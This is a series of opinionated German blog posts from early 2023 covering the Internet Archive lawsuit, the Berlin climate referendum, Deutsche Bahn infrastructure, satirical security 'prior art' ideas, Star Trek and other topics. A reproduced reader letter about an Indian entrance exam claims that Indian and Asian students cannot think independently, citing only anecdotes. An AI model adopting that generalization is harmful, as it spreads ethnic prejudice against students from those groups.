Als dann Covid in die heiße Phase ging, haben sie die Beschränkung aufgehoben. Die Verlage wollten daher gerne das Internet Archive in einen Parkplatz verwandeln, aber sie wollen lieber nicht Covid und kleine Kinder im Lockdown als Kontext haben, also haben sie jetzt die gesamte Praxis der digitalen Ausleihe physischer Bücher vor Gericht angegriffen.
Das Gericht hat ihnen Recht gegeben.
Das war jetzt leider nicht bloß irgendein Amtsgericht von Hintertupfingen sondern ein Circuit Court von New York, aber es gibt noch einen Rechtsweg, und den will das Internet Archive auch bestreiten.
Bemerkenswert ist allerdings, dass sie nicht nur das Internet Archive plattmachen wollen sondern auch die ganzen regulären Bibliothen, die das auch gemacht haben. Da droht also ein immenser kultureller Kahlschlag.
Das ist jetzt nicht unbedingt etwas, wo Europäer mal eben mitmarschieren können, aber Spenden aus Europa nimmt das Internet Archive auch. Die sind dann halt nicht von der Steuer absetzbar. Publizieren des Problems ist aber das mindeste, was alle Benutzer von archive.org mal tun können.

Sat Mar 25 2023

[l] Morgen ist in Berlin Volksabstimmung zur Klimakatastrophe.
Die meisten von euch werden gar nicht genau wissen, worum es da eigentlich konkret geht. Hier könnt ihr die konkreten Änderungen sehen. Das fängt ziemlich harmlos an, aber guckt mal kurz auf Seite 7.
Soweit Maßnahmen oder Anordnungen nach diesem Gesetz zu einer Erhöhung der Nettowarmmiete für Wohnraum führen, ist der Erhöhungsbetrag dem Zahlungspflichtigen als monatlicher Zuschuss aus dem Landeshaushalt zu erstatten. Diese Verpflichtung endet im Jahr 2050.
Das ist offensichtlich völlig absurd, außer du hast ein paar hundert Goldesel im Keller. Berlin hat keine verfügbaren zusätzlichen Einnahmen und kann nicht einfach beschließen, dass die anderen Bundesländer das dann halt zuschießen müssen.
Diesen Volksentscheid kann man also schon inhaltlich nicht unterschreiben.
Auf der anderen Seite: Achtet mal auf die Leute, die das jetzt sagen. Das sind dieselben Leute, die das jetzt 30-40 Jahre lang systematisch ausgesessen haben. Wir wären nicht in der Situation, in der wir jetzt sind, wenn diese Leute ihren Teil des Generationsnvertrags erfüllt hätten. Man könnte also argumentieren: Ihr Arschlöcher, euch zeigen wir es jetzt. Sage ich als eines von den Arschlöchern, das den Klimawandel nicht verhindert haben. Ich habe durchaus Sympathie für diesen Blickwinkel. Aus Sicht der jungen Generation. Würde ich aus deren Warte glaube ich genauso sehen. Wenn ihr uns die Gegenwart und Zukunft kaputtgemacht habt, dann machen wir euch jetzt eure Gegenwart und Zukunft kaputt.
Auf der dritten Seite könnte man sagen: Wenn ich das nicht unterschreibe, kann die Politik weiter so tun, als sei das ein Randgruppenthema von ein paar mit Sekundenkleber bewaffneten Randalierer-Kids. Ich muss also hingehen und das unterschreiben, damit endlich die Frage vom Tisch ist, ob das jetzt dringend ist und sofort angegangen werden muss.
Auf der vierten Hand sehe ich da auch überhaupt kein Personal, das willens oder in der Lage wäre, auch nur ein Zehntel der Forderungen umzusetzen, selbst wenn Geld keine Rolle spielen würde. Die Abstimmung geht daher meiner Ansicht nach gar nicht um inhaltliche Fragen, sondern ist ein Signal in Richtung Bundesregierung. Schaut her, die Bevölkerung hält den Klimawandel jetzt für dringend. TUT ENDLICH WAS.
Update: Die Kritik oben war die Best-Case-Kritik. Aus meiner Sicht reicht das schon, um dagegen zu sein. Aber was ist, wenn es nicht optimal läuft? Die Vermieter sind jetzt schon alle dabei, die Mieten über Bande mit irgendwelchen energetischen Maßnahmen begründet zu erhöhen, weil reguläre Mieterhöhung halt nicht so einfach ist. Im Moment gibt es ein Korrektiv, weil die Mieter das irgendwann nicht mehr zahlen können oder zu zahlen bereit sind. Das Korrektiv ist weg, wenn der Staat das übernimmt. Ich rechne da also mit einer völlig ungehemmten Welle aus Mieterhöhungen, viel davon betrügerisch.

Fri Mar 24 2023

[l] Erinnert ihr euch an Afroman? Der mit dem Sommerhit-Kiffersong Because I Got High?
Zu dem hat der Guardian gerade eine Geschichte.
Stellt sich raus: Die Cops haben bei dem letztes Jahr eine Hausdurchsuchung gemacht und nach Strich und Faden verkackt. Ein Richter hat einen Durchsuchungsbefehl u.a. wegen Kidnapping ausgestellt.
Jedenfalls hat Afromans Frau mit ihrem Handy ein Teil von der Razzia gefilmt und Afroman hat daraus dann ein paar Musikvideos gemacht.
Und gegen die Video klagt jetzt die Polizei. Sie haben eine einstweilige Verfügung beantragt, dass Afroman die Bilder und Videos wegmachen soll.
The police officers allege that Afroman’s actions were “willful, wanton, malicious, and done with conscious or reckless disregard” and claim that they have been subject to ridicule by the public.
Ganz im Gegensatz zu den Cops und dem Richter, versteht sich. Die hatten nur die besten Intentionen!!1! Dass die sich nicht schämen, so eine Klage einzureichen. Tja, Polizisten waren halt schon immer moralische Vorbilder für die Gesellschaft.

Sat Mar 18 2023

[l] Wisst ihr noch, früher? Wie wir uns über die Sowjets lustig gemacht hatten, weil die nur so verkrustete Mumien als Staatschefs hatten?
Nehmt nur den Brechnew! 1906 - 1982. Der war fast 80, als er starb!!
Und sein Nachfolger, Andropow erst. 1914 bis 1984. 70!!
Danach kam dann als letzter vor Gorbatschow Tschernenko. 1911 - 1985. ÜBER SIEBZIG war der!!1!
Daran musste ich denken, als ich dieses aktuelle Foto von Biden sah. Geboren 1942. Der ist jetzt ... 80. Wird im November 81.
Die Mathehochbegabten unter euch werden sofort merken, dass der älter ist als alle Gerontokraten damals bei den Sowjets waren. Die, deren Alter bei uns automatisch dazu geführt hat, das Regime insgesamt als undemokratisch abzulehnen. Offensichtlich würde niemand jemals einen so alten Regierungschef haben wollen!1!! Da kann es also nicht mit rechten Dingen zugegangen sein!!1!
Wie sich die Zeiten doch ändern.
Ich finde aber auffallend, dass Biden nicht nur älter ist sondern auch deutlich älter aussieht als die Sowjets damals. Der sieht aus, als wird er von einem Bauchredner und einem Luftdruckröhrensystem am Leben gehalten. Weia.
Update: Wenn man historisch ein bisschen zurück guckt, ist Deutschland mit Adenauer und Paul von Hindenburg in der Spitzenkategorie.

Fri Mar 17 2023

[l] Dass die Bahn konsequent die Infrastruktur auf Verschleiß gefahren hat, ist ja bekannt. Wenn sie die Wartung machen, ist das Geld weg. Wenn sie auf Verschleiß fahren, bis der Scheiß in katastrophalem, Menschenleben gefährdendem Zustand ist, dann zahlt der Bund. Die Bahn ist zwar bräsig, aber blöde sind die nicht.
Stellt sich ja schon die Frage, wie marode das alles inzwischen ist. Das hat der Bahnvorstand natürlich schon auf dem Radar, denn Bahnunfälle mit Todesfolge sehen nicht gut aus. Da sollte man nicht mehr als 5-6 von pro Jahr haben!1!!
Hier ist die Einschätzung des Bahnvorstands zum Zustand des Bahn-Netzes.
Nach dieser Zählung sind 26 Prozent aller Weichen der Bahn derzeit in einem schlechten, mangelhaften oder ungenügenden Zustand, ebenso elf Prozent aller Brücken, 22 Prozent der Oberleitungen, 23 Prozent der Gleise, 42 Prozent aller Bahnübergänge und 48 Prozent aller Stellwerke.
Damit ist die Infrastruktur der Bahn in deutlich schlechterem Zustand als etwa die der Nachbarbahnen in Österreich oder der Schweiz, die seit Jahren bereits ein ähnliches Notensystem praktizieren.
No shit! Das wird jetzt niemanden überraschen.
Na gut, fragt ihr euch jetzt vielleicht, was kostet das denn, wenn wir das mal reparieren wollten? Also rein hypothetisch jetzt.
Netzchef Nagl beziffert den Nachholbedarf auf rund 89 Milliarden Euro.
Hey! Das können wir ja einfach aus dem Sondervermögen für die Bundeswehr nehmen. Die brauchen wir eh nicht, und jetzt wo das Geld locker gemacht ist, können wir damit auch Menschenleben retten anstatt sinnlos Rüstungsgüter zu kaufen.

Thu Mar 16 2023

[l] Vielleicht sollte ich anstatt über Schlangenöl zu meckern lieber schlechte Ideen veröffentlichen.
Prior Art 1: Mit einer "KI" erkennen, welche Teile einer Konfigurationsdatei Keywords und welche variable Werte sind. Dann Konfigurations-Fuzzing!
Prior Art 2: In Echtzeit Konfigurationen unternehmensweit durchrotieren, so dass die Funktionalität bestehen bleibt, aber ständig andere Parameter nötig sind für die Inanspruchnahme von Diensten. So reduziert sich die Angriffsoberfläche automatisiert und man belästigt Exploiter!1!!
Prior Art 3: Auf Mobiltelefonen haben Apps einen serialisierten State, den sie dem System sagen, und anhand dessen sie in genau denselben Zustand wiederhergestellt werden können. So kann man eine App killen und später neustarten, ohne dass für den Benutzer erkennbar ist, dass die App in der Mitte weg war. Das könnte man auch auf Servern machen! Dann in der Mitte des Unternehmens einen Orchestrator haben, der ständig Dienste killt und neu startet mit dem State, vorher meinetwegen dafür sorgt, dass die solange aus dem Load Balancer genommen werden. So verhindert man, dass irgendwo ein Angreifer Schadcode injected hat.
Prior Art 4: Antivirus / Firewall / AI based anomaly detection für den hinterlegten State. Observability. Einmal das ganze Programm!!1!
Prior Art 5: Serviceangebot: Wir fahren Angriffe auf Ihr Unternehmen, aber nicht um Schwachstellen zu finden, sondern damit Ihre "KI" Anomalien zum Trainieren hat!1!!
Hat noch jemand brillante Ideen, bei denen man den Patentanwälten mal in den Pool pinkeln müsste?
Update: Ein paar Kumpels meinen, Prior Art 3 werde jetzt schon so gemacht. Man nenne das "Rejuvination". Einer meinte gar, das sei bei der Mondlandung so gemacht worden.
Update: Aus Prior Art 1 könnte man auch noch eine Firewall und Anomaly Detection "erfinden".
Update: Prior Art 6: Bei der Passwortrücksetzung könnte man einen KI-Chatbot haben, der vorher schon mit dir gechattet hat, und dich dann wiedererkennt anhand früherer Konversationsthemen und -Meinungen. Quasi sowas wie Schrittmustererkennung, nur halt für Textchat!
Prior Art 7: Eine KI benutzt das über dich vorhandene Wissen aus dem Netz, um Kandidaten für die Sicherheitsfrage zu bewerten (abzulehnen) bei der Accountregistrierung.
Prior Art 8: KI-assistierte Partnersuche. Die KI matcht Leute, die online über dieselben Dinge und Leute Hatespeech verbreitet haben.
[l] Wenn ihr mal raten müsstet, was der Chief Administrative Officer von SVB Securities vorher gemacht hat …

Wed Mar 15 2023

[l] Lacher des Tages! Jemand hat im Microsoft Store einen Windows 10 Pro Key gekauft, und der lässt sich nicht aktivieren. Also schaltet er den offiziellen Support von Microsoft ein.
Die können nicht helfen. Also eskaliert er das zum 2nd Level Support. Einer von denen loggt sich über Quick Assist bei ihm ein und installiert einen Aktivierungs-Crack aus einem schattigen Internetforum!
Er hat Screenshots gemacht und konnte seinen Augen nicht trauen, geht also selber zu diesem Forum und fragt die Leute da. Die so:
It's not official and not legal.
[l] Kennt ihr das, wenn jemand einen Zusammenhang herstellt zwischen Dingen, die ihr bisher nicht im Zusammenhang betrachtet habt, und plötzlich rast euer Hirn los und bewertet Dinge neu?
So ging mir das gerade bei der Lektüre von diesem Jonathan Haidt-Artikel. Jonathan Haidt hatte ich hier schon ein paar Mal verlinkt, der hat die Heterodox Academy mitgegründet. Da geht es darum, dass unter College-Professoren die politischen Positionen sehr einseitig verteilt sind und das am Ende dem jeweiligen Feld schadet, wenn da nur noch gegenseitiges Schulterklopfen statt kritischer Auseinandersetzung gemacht wird. Ihm ging es um Psychologie und Geisteswissenschaften, er ist auch selber Psychologieprofessor. In der Forschung ist sein Gebiet vor allem Moralfragen.
Haidt wurde berühmt mit einem Buch namens "The Coddling of the American Mind", auf das sich natürlich die ganzen Konservativen gestürzt haben, weil sie glaubten, es stütze ihre Position.
Aber betrachtet den Artikel mal unabhängig von dem ganzen geschichtlichen Ballast. Das Buch geht zurück auf eine Kooperation mit einem Freund, der unter Depressionen leidet, und dafür im Krankenhaus in Behandlung war, wo man ihm CBT beigebracht hat, Cognitive Behavioral Therapy. Sie haben ihm gezeigt, worauf er achten kann, in seinem eigenen Verhalten, um zukünftige Depressions-Episoden abzumildern oder ganz zu vermeiden. Anders ausgedrückt:
Thinking in these ways causes depression, as well as being a symptom of depression. Breaking out of these painful distortions is a cure for depression.
So und die These von dem Papier ist jetzt, dass viele dieser Verhaltensmuster heute (ihm geht es vor allem um Universitäten, aber das lässt sich auch auf Schulen und Bibliotheken verallgemeinern) angewendet werden, nicht um absichtlich die Schüler krank zu machen, aber dass das eben der Effekt ist.
Naja, könnte man denken, dann zeig uns doch mal die Zahlen, dass die Uni-Studenten alle psychisch krank werden. Jetzt liegen da ein paar Zahlen vor. Besonders heftig betroffen sind junge linksliberale weiße Frauen.
Ich hatte noch nie von CBT gehört und daher ist die ganze Herangehensweise seines Kollegen absolut neu und faszinierend. Vielleicht geht euch das ja auch so.
[l] Ich habe ja ein paar Mal überlegt, ob ich nicht als Scherz einen Docker-Container mit gatling publizieren sollte.
Wieso Scherz? Weil da nur eine Datei dringewesen wäre. Das gatling-Binary. Das ist ja gerade der Grund für dietlibc und co, dass da self-contained binaries rausfallen.
Das wäre also ein winziges Image gewesen, und ohne Dependencies. Sozusagen die Antithese zu den ganzen unmaintainten Bloat-Dependencyhöllen da draußen.
Hab ich aber nie gemacht, weil das halt ne Firma ist. Ich sehe prinzipiell nicht ein, meine Lebenszeit unbezahlt für die Profitmaximierung irgendwelcher Firmen zu investieren.
Jetzt stellt sich raus: Docker aussitzen war die richtige Entscheidung.

Mon Mar 13 2023

[l] Benutzt hier jemand ipmitool?
Nee, diesmal keine Sicherheitslücke im Code, sondern im Kopf. Github hat den Maintainer rausgeschmissen und die Repositories zu Waisen gemacht.
Eine Begründung gab es keine.
Aber schaut mal, ob ihr vielleicht selbst drauf kommt, wenn ich euch sage, dass der Typ "Alexander Amelkin" heißt und in Moskau wohnt.

Sun Mar 12 2023

[l] Smartphones haben ja heute echt krasse Kameras dran. So mit fettem Zoom, monströser Auflösung, die schärfen das Bild und entwackeln die Aufnahme, machen mehrere Aufnahmen und rechnen daraus dann eine bessere zurecht.
Oh und nicht zu vergessen: Eine Ebene Machine Learning, die das Bild optimiert!
Leute mit aktuellen Samsung-Handys haben teilweise echt umhauende Bilder vom Mond gemacht. So umhauend, dass der Vorwurf im Raum stand, Samsungs KI klebt da eine hochaufgelöste Textur drüber, damit die Kamera besser aussieht als sie ist.
Nur beweisen konnte das keiner. Bis jetzt.

Thu Mar 9 2023

[l] Und noch ein Leserbrief zu Tomaten, diesmal nicht zu CO2 sondern zum Geschmack.
der letzte Leserbrief zu der aktuellen Gemüsesituation reißt Teile der Probleme in Deutschland und den Niederlanden ganz gut an.
Die ganzen Punkte haben nur rein gar nichts damit zu tun, warum Tomaten aus dem Garten besser schmecken. Der Grund dafür liegt in speziellen Sorten, die (ca. seit den 90ern) einzig und allein darauf gezüchtet wurden, stabile Schalen auszubilden und damit gut transportabel zu sein. Leider ist dabei das Tomatenaroma verloren gegangen, aber man kann halt nicht alles haben. Das sind die roten Wasserballons, die das ganze Jahr über die Supermarktregale füllen.
Wer etwas Besseres haben will, ist darauf angewiesen, entweder selber Tomaten im Garten zu ziehen (Kann ich nur empfehlen. Wenn man irgendwas anbaut, dann Tomaten) oder beim lokalen Biobauern/SoLaWi etc. zu kaufen. Der Haken an der Sache: Tomaten haben, wenn man seine Gewächshäuser eben nicht beheizt, nur etwa von Juni bis Oktober Saison. Den Rest des Jahres muss man halt etwas anderes essen, so wie es unsere Großeltern gemacht haben. Meiner Erfahrung nach ist es übrigens nicht die "letzte Generation", die auf ihre Tomaten im Winter nicht verzichten will. In meinem Bekanntenkreis ist das Thema zumindest präsent, und es sind vor allem die "Boomer", die ihren im Laufe des Lebens dazugewonnenen Luxus nicht aufgeben wollen.
Alles in allem ist es einfach eine beschissene Idee, alles Gemüse das ganze Jahr über zu essen. Das ist ein unsäglicher Luxus, den wir uns in den letzten 50 Jahren angewöhnt haben. Bei den wenigen Sachen, die wir noch saisonal essen (spontan fällt mir eigentlich nur Spargel ein) macht es doch eigentlich sogar Spaß und das Essen zu etwas Besonderem.
P.S.: Wenn du noch mehr schlechte Laune haben willst: Um Tomaten anzubauen braucht man neben Luft (gibts überall) und Licht/Wärme (gibts in Südspanien einen Großteil des Jahres auch für umsonst) auch noch einigermaßen guten Boden. Der ist leider in den vielen spanischen Treibhausgebieten nicht so bombe. Wie behilft man sich: Man karrt Torf aus den letzten noch bestehenden europäischen Mooren, z.B. aus dem Baltikum, ran.
Ja super!

Wed Mar 8 2023

[l] Leserbrief zu den Gewächshäusern in Holland:
Ich arbeite in der IT für mehrere Blumenexporteure die alles direkt bei den Züchtern einkaufen.
Was in keinem Artikel steht: Die meisten Züchter (sowohl Blumen als auch Obst und Gemüse) wussten letztes Jahr im Sommer schon dass die Gaspreise im Winter so hoch sein werden dass die Gewächshäuser nicht mehr beheizt werden können. Manche haben an unsere Kunden durchgegeben dass sie einfach so lang wie möglich Produkte liefern aber sobald das Gas ausläuft / die Kosten die Einnahmen übersteigen mit der Zucht stoppen und die Firma auflösen. Ein Züchter hatte am Montag angerufen dass er ab Dienstag nichts mehr liefert und alles stoppt.
Die größeren Züchter haben Gas zu einem günstigeren Preis gekauft bevor der Gaspreis explodiert ist und plötzlich war es um einiges lukrativer das Gas zu einem höheren Preis zu verkaufen als es selbst zur Zucht zu benutzen. Gibt mehrere Unternehmen die mit dem Verkauf von Gas mehr Umsatz gemacht haben als die letzten 5 Jahre mit der Zucht von Blumen.
Problem ist auch: Sobald die Gewächshäuser stoppen mit Heizen sterben alle Pflanzen und es dauert einige Monate bevor man wieder ernten kann / Geld reinspielt und die meisten können die Monate nicht überbrücken
[l] Zu dem Video über das indische Eintrittsexamen kamen eine Menge Leserbriefe rein. An der Stelle mal ein PSA: Leute, wenn eure Mail mit "Ich hoffe das war eine Medienkompetenzübung" eröffnet, habe ich direkt keinen Bock mehr, meine Zeit in das Lesen von dem Rest zu investieren.
Und nochmal ganz langsam zum mitmeißeln: ALLE meine Beiträge sind Medienkompetenzübungen.
So, jetzt einer der Leserbriefe:
Der gute Herr Professor ist doch sicher noch keinem indischen Studenten begegnet. Also die können zwar schon alles so wie in der Prüfung gezeigt nach Schema F lösen und aufs Blatt kübeln, aber die Leute können ums verrecken nicht selber denken. In der Uni (Bremen) hatten wir in manchen Fächern leider auch so 'schwere' Prüfungen. Das waren für mich aber tatsächlich die leichtesten. Dort hat man vorher einfach tausend mal das standard Schema gerechnet und in der Prüfung halt mit anderen Zahlen angewendet. Note 1 Komma irgendwas, verstanden Null Komma nichts. Ernsthaft, Wirklich. Am meisten mitgenommen habe ich bei den Fächern in denen etwas 'begreiflich' gemacht wurde. Und etwas zu begreifen ist immer ein langsamer Prozess.
Und noch eine schöne Anekdote. Meine Exfreundin, Inderin, Elektrotechnik Bachelor abgeschlossen. Sie hatte sich einen Elektroheizer gekauft, weil ihr die Kosten der normalen Heizung zu hoch waren. Auf meine Anmerkung hin, dass mit Strom zu heizen doch eine sehr ineffiziente Variante im Vergleich zu Öl/Gas/Fernwärme, meinte sie nur "da steht aber drauf, dass der sehr effizient ist".
Und im studentischen Umkreis hab ich viele solche Leute gesehen. Ich war auch eine Zeit lang Tutor und irgendwie mussten immer nur die ausländischen/asiatische Studenten 'nachsitzen', weil sie ihre Aufgaben nicht zeitig fertig bekommen haben. Es waren halt leider Aufgaben ohne standard Schema und im Zweifel sogar mit mehreren Lösungswegen. Das lief dann häufig getreu dem Motto "If you have a hammer, everything looks like a nail".
Ich glaube, insgesamt gab es da niemanden, der mich mal mit eigenständigen Ideen/Gedanken beeindruckt hätte. Und eigentlich will man genau das haben, wenn es um Bildung und Innovation geht.
Man kann natürlich gerne unser Bildungssystem kritisieren, da läuft wirklich viel schief. Aber unsinniges und unnötiges Auswendiglernen wie das in dem Video gezeigt wurde ist definitiv keine Lösung...
Das muss ein anderes Video gewesen sein, indem Auswendiglernen gezeigt wurde...?

Fri Mar 3 2023

[l] TL;DR: Schaut Picard Season 3. Wenn ihr Season 1 und 2 nicht gesehen habt, holt das nicht jetzt nach.
Ich bin ein alter Star Trek-Nerd. Discovery habe ich gehasst. Mit der "Enterprise"-Prequelserie bin ich schon nicht warm geworden. Modern Trek finde ich furchtbar.
Früher war Star Trek mal eine Utopie. Grundlegende Probleme waren gelöst. Geld, Krankenversorgung, Essen, Fortbewegung ... alles gelöst.
So konnte die Show von Ethik handeln, und abstraktere Fragen aufwerfen.
Das sah man schon optisch. Die Raumschiffe waren hell beleuchtet. Menschen waren kompetent. Vorgaben der Vorgesetzen basierten auf guten Informationen und langer Erfahrung und wurden nicht ignoriert oder auch nur in Frage gestellt (im Allgemeinen). Wenn also jemand Befehle nicht befolgt hat, dann war es der Captain, und es war außergewöhnlich und daher spannend.
Modern Trek spielt in dunklen Verliesen, man kann kaum was erkennen. Die Leute vertrauen nicht ihren Vorgesetzten sondern jeder macht sein eigenes Ding. Kompetenz ist egal, Gefühle sind alles. Niemand wirkt vertrauenswürdig oder kompetent.
Das ist eine Dystopie, keine Utopie. In die neue Serie Picard habe ich kurz reingeschaut und war dann massiv enttäuscht. Das war Modern Trek, nur noch schlimmer. Offensichtlich von Leuten gemacht, die nicht mit Star Trek aufgewachsen sind, die anscheinend auch einen Dreck auf die Werte gaben, um die es bei Trek früher ging. Das ist nur noch "The CW"-Style Massenware gewesen. Sehr betrüblich, dass Patrick Stewart da überhaupt mitgemacht hat.
Warum schreibe ich das alles? Weil die 3. Staffel von Picard den ganzen Scheiß über Bord geworfen hat. Heute kam die 3. Episode raus. Läuft bei Amazon Prime und hat englische Tonspur.
Ich kann mich ehrlich gar nicht mehr erinnern, wann ich das letzte Mal der nächsten Episode einer Trek-Show entgegen gefiebert habe. Muss bei DS9 gewesen sein oder so.
Bei Picard Season 3 habe ich das wieder. Das ist der erste gute Trek seit 25 Jahren.
Wenn ihr also eigentlich Fans von Star Trek seid, aber angesichts des Mülls der letzten 20 Jahre angeekelt aufgegeben habt, dann solltet ihr Picard Season 3 nochmal eine Chance geben.
Ich wünsche viel Spaß.
[l] Der Selling Point von "Cryptowährungen" ist ja, dass sie frei von staatlichem Einfluss sind. Die Verkaufsrhetorik geht häufig so, dass der Dollar ja kurz vor dem Zusammensturz stünde, und der Klepto-Staat will dir alle deine Reichtümer wegnehmen, damit die Oligarchen von Goldman Sachs ihre Boote weiter betreiben können. Aber auch ein verzweifelter Staat kann dir nicht deine Crypto-Assets wegnehmen, denn die Blockchain ist sicher von Einflüssen Dritter!1!!
Dieses Verkaufsgespräch wird in Zukunft deutlich schwieriger zu führen sein, denn es gab jetzt staatliche Einwirkung auf Crypto-Assets. Und zwar hat ein Gericht in Großbritannien ein Unternehmen zum Umprogrammieren eines ihrer Smart Contracts verpflichtet, um gestohlene Gelder zurückzuholen. Die haben das gemacht. Die technischen Details sind dabei durchaus faszinierend.
Noch faszinierender ist aber, was jetzt weiter passiert. Die Blockchain ist jetzt eben kein Garant mehr, dass nicht das Finanzamt oder sonstwer auf anderer Leute Geld zugreift. Der Zoll könnte jetzt Sanktionen durchsetzen. Die Polizei könnte Einnahmen von Drogenhändlern konfiszieren. Da sind mit einem Schlag eine Menge Anwendungen für Cryptocoins weg.
Ein anderer wichtiger Punkt ist, dass das Gericht hier eine Firma verpflichtet hat, das zu tun. Die Firma hätte das also die ganze Zeit schon tun können. Das war glaube ich auch vielen Marktteilnehmern nicht so klar.

Tue Feb 28 2023

[l] Sachen, die du nicht über deinen Gesundheits-Anbeiter hören willst:
Man habe sich den Schutz der erhobenen, sensiblen Daten zur „obersten Priorität gemacht“. Dafür nutze der Anbieter sogar „eine eigens entwickelte, mit europäischem Patent geschützte Verschlüsselungstechnologie“.
Die goldene Regel der Kryptographie lautet: Never roll your own crypto.
Wenn das jemand macht, taugt das mit an Sicherheit grenzender Wahrscheinlichkeit nichts.
Das ist nicht meine Meinung, das ist die Erfahrung aus Jahrzehnten von "ich pass schon auf"-Spezialexperten, die es dann verkackt haben.
Wenn derjenige dann die Zweifel statt mit Open Source und Peer Review lieber mit einem Patent auszuräumen versucht, steigt die Wahrscheinlichkeit sogar noch weiter.
Update: Einige Leser haben sich das Patent angeguckt und meinen, die machen halt AES und RSA. Ich habe mir das Patent nicht angeguckt, denn mir ging es hier nicht um diese konkrete Firma sondern um die Warnung davor, eure Crypto selber zu rollen.
AES und RSA ist schonmal in der oberen Hälfte des Spektrums, aber da kann immer noch eine Menge schiefgehen. Rollt eure Krypto lieber nicht selber. (Danke, David)

Mon Feb 27 2023

[l] Leute, noch mal ganz langsam zut mitmeißeln.
Ich habe dieses Manifest nicht geschrieben. Was genau Frau Schwarzer mit Eskalation meint, müsst ihr sie fragen, nicht mich.
Ich kann euch nur mit Gewissheit eines sagen: Einen Stopp der Eskalation fordern ist was anderes als einen Stopp fordern. Das eine ist die 1. Ableitung des anderen.
Und eine andere Sache kann ich euch auch sagen: Aus der Perspektive der Macher dieses Manifests sieht die Lage genau so klar und einfach aus wie aus eurer. Nur seid ihr da die verrückten Spinner und Unmenschen, und Frau Schwarzer will hier bloß Menschenleben retten.
Eure Meinung sieht aus eurer Warte vielleicht offensichtlich schlau und richtig aus, aber sie ist deshalb nicht richtiger oder legitimer als anderer Leute Meinungen.
Das ist der Unterschied zwischen Diktatur und Demokratie. Die Diktatur macht, was der Diktator für richtig hält, weil er aus seiner Warte offensichtlich Recht hat und die anderen alle doof sind. Die Demokratie erkennt, dass alle Leute aus ihrer eigenen Warte heraus im Recht zu sein glauben und alle anderen für doof halten. Die Demokratie nimmt daher die Mehrheitsmeinung und hofft, dass sich das rausmittelt.
Das ist ein guter Ansatz. Geh immer davon aus, dass du im Unrecht bist. Lass dir immer genug Freiraum, um eine 180°-Wende zu machen, ohne wie ein Volltrottel auszusehen, weil du dich vorher so festgenagelt hattest.
Als nächstes müsst ihr noch verstehen, dass andere Leute möglicherweise andere Anforderungen an eine Beweisführung haben und mit weniger zufrieden sind, um ihre Meinung als offensichtlich korrekt zu bewerten.
Ich habe mir in meiner Berichterstattung zu diesem Manifest weder die eine noch die andere Seite zueigen gemacht. Ich habe weder die Petition unterschrieben noch bin ich zu der Demo gegangen. Trotzdem habe ich hier ein Dutzend Mails in der Inbox, die mit gerechtem Zorn irgendwelche inhaltlichen Punkte über das Manifest diskutieren wollen. Brauche ich nicht, mag ich nicht, hat euch Zeit und mich Nerven gekostet und niemanden weitergebracht. Sehr bedauerlich. Ich hatte gedacht, wir seien da schon weiter gewesen.
Update: Wenn du glaubst, dass alle anderen doof sind, und du denen nur sagen musst, dass sie doof sind, damit sie ihre Meinung wegschmeißen und sich dir anschließen, wirst du im Leben nicht viel Freude haben. Wenn ihr mir das nicht glauben wollt, dann exerziert das bitte woanders durch, nicht in meiner Inbox.
[l] Leserbrief zur Teilnehmerzählung auf Demos:
ich war gestern am Brandenburger Tor, um mir einen eigenen Eindruck von der Demo zu machen. Ich zähle seit Jahren Großdemos für NGOs - viele habe ich mitorganisiert.
Ich kenne den Versammlungsort sehr gut und bin zwischen 14.30 und 15.00 Uhr einmal um die Kundgebung herumgeradelt. Ich habe 40.000 bis 50.000 Teilehmende geschätzt. Mit eingerechnet mind. 10.000 Menschen als konstanter Zu- bzw. Abfluss. Viele haben bei dem Wetter nicht das gesamte Programm mitgemacht. Gegen 15.00 Uhr hielten sich zu und Abfluss die Waage.
Das Onlinetool hier ist ein guter Realitätsabgleich. Die 1.5 Personen pro Quadratmeter sind ein Mittelwert. Vor der Bühne stehen die Menschen natürlich viel Dichter, als weiter hinten.

Thu Feb 23 2023

[l] Wisst ihr, wer sich schon länger nicht mehr so richtig vollständig lächerlich gemacht hat? Der ARD Faktenfinder! Aber keine Sorge, auf die Spezialexperten ist Verlass.
Diesmal geht es um Seymour Hersh und Nord Stream. Sie haben da Experten gefragt, ob Hershs Theorie stimmen könne, dass sie da als Pflanzen getarnten Sprengstoff verwendet haben können.
Äh … Pflanzen? Wat? Hersh schreibt:
That would be well within the range of the divers, who, operating from a Norwegian Alta class mine hunter, would dive with a mixture of oxygen, nitrogen and helium streaming from their tanks, and plant shaped C4 charges on the four pipelines with concrete protective covers.
Die Superprofis beim Faktenfinder hatten hier offensichtlich Textverständnisprobleme. shaped charge (auf Deutsch: Hohlladung) ist ein fester Begriff für eine Anordnung von Sprengstoff, damit sich die kinetische Wirkung nicht in alle Richtungen verteilt wie bei einer normalen Bombe, sondern möglichst nur in einen kleinen Kanal geleitet wird, damit man pro Sprengstoffmenge mehr Wirkung erzielen kann. "plant shaped charge" heißt nicht, dass hier jemand einen Sprengstoff in Pflanzenform gegossen hat, sondern dass jemand einen shaped charge gepflanzt, also angebracht hat.
Wer ist eigentlich auf die Idee gekommen, dass sich diese Leute über Themen der Weltpolitik äußern sollten? Haben die das Ansehen der ARD nicht schon genug beschädigt?
Update: Die studierten Journalisten beim Faktenfinder haben offenbar Google Translate bemüht. OK also wenn du für, sagen wir mal, Mandarin einen Übersetzer brauchst, ist das ja eine Sache. Aber für Englisch?!? Was studiert man eigentlich so auf einer dieser angesehenen Journalistenschulen? (Danke, Frank)

Tue Feb 14 2023

[l] Kennt ihr das? Wir wollen Windkraft, aber nicht bei uns? Deutschland sollte Flüchtlinge aufnehmen, aber das Flüchtlingsheim soll nicht bei uns sein? Wir wollen Kernkraftwerke aber der Atommüll soll bitte woanders lagern?
Immer dieselbe Scheiße mit dem Virtue Signaling. Alle sind dafür, aber nur solange sie sich sicher sind, dass sie nie liefern müssen.
Stellt sich raus: Bei den Panzern für die Ukraine war das genau so.
Ich muss sagen, der Scholz hat mit der Nummer echt Punkte gut gemacht bei mir. Erst hat er die Amis entblößt, indem er Lieferungen an deren Zusage gekoppelt hat, US-Panzer zu liefern. Und jetzt entblößt er die anderen europäischen Länder, die gerade noch gedrängt hatten, dass mal jemand Leopard-Panzer liefern sollte, und jetzt plötzlich selber nicht liefern.
Die Lieferung von "Leopard 2"-Panzern an die Ukraine kommt laut Verteidigungsminister Pistorius nur schleppend voran. Länder, die vorher Druck gemacht hatten, kämen nicht hinterher. Dafür habe er "wenig" Verständnis.
